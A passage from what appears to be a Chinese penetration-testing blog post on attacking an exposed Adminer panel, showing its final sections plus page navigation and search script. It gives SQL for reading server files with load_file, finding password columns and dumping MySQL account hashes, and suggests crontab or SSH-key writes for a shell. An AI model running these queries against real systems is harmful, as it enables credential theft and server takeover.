<h5 id="crontab"><a href="#crontab" class="headerlink" title="crontab"></a>crontab</h5><p>其实确定可以写文件后，利用思路就可以扩展为任意文件写入漏洞该怎么利用。自然可以想到redis写文件的那一套思路。一般mysql服务在linux上都是以mysql用户启的，而mysql用户又是没有登录权限的，所以一般来讲是没权限写crontab的，但是不排除部分奇葩环境就是用root用户启动的mysql，这时就可以尝试写入crontab反弹</p>
<h5 id="ssh-key"><a href="#ssh-key" class="headerlink" title="ssh key"></a>ssh key</h5><p>理由同上</p>
<h4 id="读系统文件"><a href="#读系统文件" class="headerlink" title="读系统文件"></a>读系统文件</h4><p>有可能有特大的文件用mysql读文件的洞读不到，这时可以在adminer后台使用load_file去尝试读一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#常规读文件</span><br><span class="line">select load_file(&#x27;C:\\phpstudy_pro\\WWW\\index.html&#x27;)</span><br><span class="line">#路径可以使用hex编码，且读到的数据是blob格式，需要hex编码一下方便取出来</span><br><span class="line">select hex(load_file(0x433A5C5C70687073747564795F70726F5C5C5757575C5C696E6465782E68746D6C))</span><br></pre></td></tr></table></figure>

<h4 id="读数据库中网站管理员用户密码"><a href="#读数据库中网站管理员用户密码" class="headerlink" title="读数据库中网站管理员用户密码"></a>读数据库中网站管理员用户密码</h4><h5 id="直接找密码字段"><a href="#直接找密码字段" class="headerlink" title="直接找密码字段"></a>直接找密码字段</h5><p>一般adminer这边干不动，就可以去尝试下网站后台那边是否有可以相互配合的漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#搜索es库中包含pass字段的表名</span><br><span class="line">select table_schema,table_name,column_name from information_schema.COLUMNS where column_name like &#x27;%pass%&#x27; and table_schema=&#x27;es&#x27;</span><br><span class="line">#搜索所有库中包含pass字段的表名</span><br><span class="line">select table_schema,table_name,column_name from information_schema.COLUMNS where column_name like &#x27;%pass%&#x27;</span><br></pre></td></tr></table></figure>

<h5 id="读mysql账户的密码"><a href="#读mysql账户的密码" class="headerlink" title="读mysql账户的密码"></a>读mysql账户的密码</h5><p>如果无法获得网站管理员的明文密码，可以尝试读取并解密mysql用户的账号密码，并根据解密后的密码内容猜测网站管理员后台账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># MySQL 5.6 and below</span><br><span class="line">select host, user, password from mysql.user;</span><br><span class="line"># MySQL 5.7 and above</span><br><span class="line">select host, user, authentication_string from mysql.user;</span><br></pre></td></tr></table></figure>

<h4 id="阅读数据库信息"><a href="#阅读数据库信息" class="headerlink" title="阅读数据库信息"></a>阅读数据库信息</h4><p>数据库中有一些高价值数据，能辅助我们获取shell</p>
<h5 id="云服务器的AK"><a href="#云服务器的AK" class="headerlink" title="云服务器的AK"></a>云服务器的AK</h5><p>可能数据库中存有云服务器的Aceeskey，一样能拿到权限</p>
<h5 id="序列化数据"><a href="#序列化数据" class="headerlink" title="序列化数据"></a>序列化数据</h5><p>观察到某个表中有序列化数据，则要把数据取出来使用必然会涉及到反序列化，根据表名和网站后台找到相关反序列化点，可能能配合一些已知框架的序列化链取得权限</p>
<h5 id="网站配置信息"><a href="#网站配置信息" class="headerlink" title="网站配置信息"></a>网站配置信息</h5><p>配置信息里有很多高价值信息，例如网站路径，使用的中间件版本等等，亦或者我们能直接在数据库中更改文件上传的后缀配置，把脚本文件后缀添加到数据库的白名单中。</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2022-04-13 16:36:19
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/04/14/Oracle%2011gR2%E6%B3%A8%E5%85%A5%E7%9A%84%E4%B8%80%E7%A7%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%A7%BF%E5%8A%BF/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%91%E7%8E%B0"><span class="toc-text">发现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-text">利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9Aadmirer%E7%89%88%E6%9C%AC"><span class="toc-text">确定admirer版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E6%81%B6%E6%84%8Fmysql%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-text">搭建恶意mysql服务器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#MySQL-Fake-Server"><span class="toc-text">MySQL_Fake_Server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Rogue-mysql-server"><span class="toc-text">Rogue_mysql_server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Rogue-Mysql-Server"><span class="toc-text">Rogue_Mysql_Server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MysqlHoneypot"><span class="toc-text">MysqlHoneypot</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%95%B0%E6%8D%AE%E5%BA%93%E6%96%87%E4%BB%B6%E8%8E%B7%E5%8F%96%E7%BD%91%E7%AB%99%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84"><span class="toc-text">利用操作系统数据库文件获取网站绝对路径</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F"><span class="toc-text">判断操作系统</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E7%B3%BB%E7%BB%9F%E5%90%8E%E8%BF%9B%E9%98%B6%E5%88%A9%E7%94%A8"><span class="toc-text">判断系统后进阶利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#windows"><span class="toc-text">windows</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#linux"><span class="toc-text">linux</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8php%E6%A1%86%E6%9E%B6%E8%8E%B7%E5%8F%96%E7%BD%91%E7%AB%99%E7%9B%B8%E5%AF%B9%E8%B7%AF%E5%BE%84"><span class="toc-text">利用php框架获取网站相对路径</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Thinkphp"><span class="toc-text">Thinkphp</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%BB%93%E8%AE%BA"><span class="toc-text">结论</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#adminer%E5%90%8E%E5%8F%B0%E6%88%98%E6%B3%95"><span class="toc-text">adminer后台战法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%BD%91%E7%AB%99%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84"><span class="toc-text">获取网站绝对路径</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%BD%91%E9%A1%B5%E6%8A%A5%E9%94%99"><span class="toc-text">网页报错</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%95%B0%E6%8D%AE%E5%BA%93%E6%96%87%E4%BB%B6"><span class="toc-text">操作系统数据库文件</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%89%8B%E5%B7%A5%E7%8C%9C%E6%B5%8B"><span class="toc-text">手工猜测</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6"><span class="toc-text">日志文件</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF"><span class="toc-text">数据库信息</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99webshell"><span class="toc-text">写webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#outfile"><span class="toc-text">outfile</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#dumpfile"><span class="toc-text">dumpfile</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#general-log"><span class="toc-text">general_log</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#slow-query-log-file"><span class="toc-text">slow_query_log_file</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E6%96%87%E4%BB%B6%E8%8E%B7%E5%8F%96shell%E6%80%9D%E8%B7%AF"><span class="toc-text">写文件获取shell思路</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#udf"><span class="toc-text">udf</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#mof"><span class="toc-text">mof</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#lpk"><span class="toc-text">lpk</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#windows%E5%90%AF%E5%8A%A8%E9%A1%B9"><span class="toc-text">windows启动项</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#crontab"><span class="toc-text">crontab</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#ssh-key"><span class="toc-text">ssh key</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AF%BB%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6"><span class="toc-text">读系统文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AF%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E7%BD%91%E7%AB%99%E7%AE%A1%E7%90%86%E5%91%98%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81"><span class="toc-text">读数据库中网站管理员用户密码</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%9B%B4%E6%8E%A5%E6%89%BE%E5%AF%86%E7%A0%81%E5%AD%97%E6%AE%B5"><span class="toc-text">直接找密码字段</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%AF%BBmysql%E8%B4%A6%E6%88%B7%E7%9A%84%E5%AF%86%E7%A0%81"><span class="toc-text">读mysql账户的密码</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%98%85%E8%AF%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF"><span class="toc-text">阅读数据库信息</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84AK"><span class="toc-text">云服务器的AK</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E6%95%B0%E6%8D%AE"><span class="toc-text">序列化数据</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%BD%91%E7%AB%99%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF"><span class="toc-text">网站配置信息</span></a></li></ol></li></ol></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/daidaitiehanhan">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://daidaitiehanhan.github.io/">Copyright © 2022 tiehanhan</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://daidaitiehanhan.github.io/">Theme by tiehanhan | Powered by tiehanhan</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85 + '&url=' + http%3A%2F%2Fexample.com%2F2022%2F04%2F13%2F%25E4%25B8%2580%25E6%25AC%25A1adminer%25E4%25B9%258B%25E6%2597%2585%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/FunnyTitle.js"></script>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>
